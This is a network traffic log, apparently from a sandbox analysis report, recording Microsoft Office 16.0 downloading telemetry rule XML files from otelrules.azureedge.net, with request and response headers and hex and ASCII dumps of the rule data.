                                                                                                                                                                                                                                                                                                    2024-12-04 01:01:01 UTC192OUTGET /rules/rule701351v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:01:01 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:01:01 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 1407
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BE687B46A"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: ddb1afd1-c01e-008d-2acd-452eec000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010101Z-174f7845968n2hr8hC1EWR9cag00000016b000000000c3z4
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:01:01 UTC1407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 66 6f 72 6d 61 6e 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Performance.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTok


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    132192.168.2.64983913.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:01:02 UTC192OUTGET /rules/rule702151v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:01:02 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:01:02 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 1397
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BE156D2EE"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: 355539d4-e01e-0099-70f9-44da8a000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010102Z-174f7845968jrjrxhC1EWRmmrs00000016sg00000000hyg5
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:01:02 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 6f 70 6c 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 6f
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.People.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPeo


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    133192.168.2.64984013.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:01:02 UTC192OUTGET /rules/rule702150v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:01:02 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:01:02 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 1360
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:28:07 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BEDC8193E"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: d00fcd24-f01e-0096-3fd4-4510ef000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010102Z-1746fd949bd77mkmhC1EWR5efc00000000vg000000000x7z
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:01:02 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 6f 70 6c 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 6f 70 6c 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.People" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPeople" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    134192.168.2.64983813.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:01:02 UTC192OUTGET /rules/rule701350v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:01:02 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:01:02 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 1370
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BDE62E0AB"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: f2a711fd-c01e-00a1-2bd1-457e4a000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010102Z-1746fd949bdwt8wrhC1EWRu6rg00000000qg000000005482
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:01:02 UTC1370INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 66 6f 72 6d 61 6e 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 72 66 6f 72 6d 61 6e 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Performance" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPerformance" S="Medium" /> <F


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    135192.168.2.64984113.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:01:02 UTC192OUTGET /rules/rule703001v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:01:03 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:01:03 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 1406
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BEB16F27E"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: 608090c1-401e-000a-38cc-454a7b000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010103Z-174f7845968n2hr8hC1EWR9cag000000168g00000000nhs6
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:01:03 UTC1406INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 30 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 4d 61 63 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703001" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Mac.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTok


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    136192.168.2.64984213.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:01:03 UTC192OUTGET /rules/rule703000v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:01:03 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:01:03 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 1369
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BE32FE1A2"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: 24302b2d-201e-005d-53cc-45afb3000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010103Z-1746fd949bd9x4mhhC1EWRb76n00000000h0000000001tzq
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:01:03 UTC1369INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 30 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 4d 61 63 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 75 74 6c 6f 6f 6b 4d 61 63 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703000" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Mac" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOutlookMac" S="Medium" /> <F T


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    137192.168.2.64984413.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:01:04 UTC192OUTGET /rules/rule700750v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:01:04 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:01:04 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 1377
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:28:02 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BEAFF0125"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: e207a0d1-601e-0097-63aa-42f33a000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010104Z-174f784596886s2bhC1EWR743w00000016pg00000000mr8f
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:01:04 UTC1377INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 37 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 75 74 6c 6f 6f 6b 44 65 73 6b 74 6f 70 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700750" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Desktop" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOutlookDesktop" S="Medium" />


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    138192.168.2.64984313.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:01:04 UTC192OUTGET /rules/rule700751v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:01:05 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:01:04 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 1414
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BE03B051D"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: 1a13926b-001e-0049-0fcc-455bd5000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010104Z-174f7845968j6t2phC1EWRcfe800000016u000000000gz7x
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:01:05 UTC1414INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 37 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700751" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Desktop.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    139192.168.2.64984513.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:01:04 UTC192OUTGET /rules/rule700151v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:01:05 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:01:04 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 1399
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BE0A2434F"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: f58ffe41-a01e-00ab-56b5-429106000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010104Z-174f7845968nxc96hC1EWRspw800000016g00000000074py
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
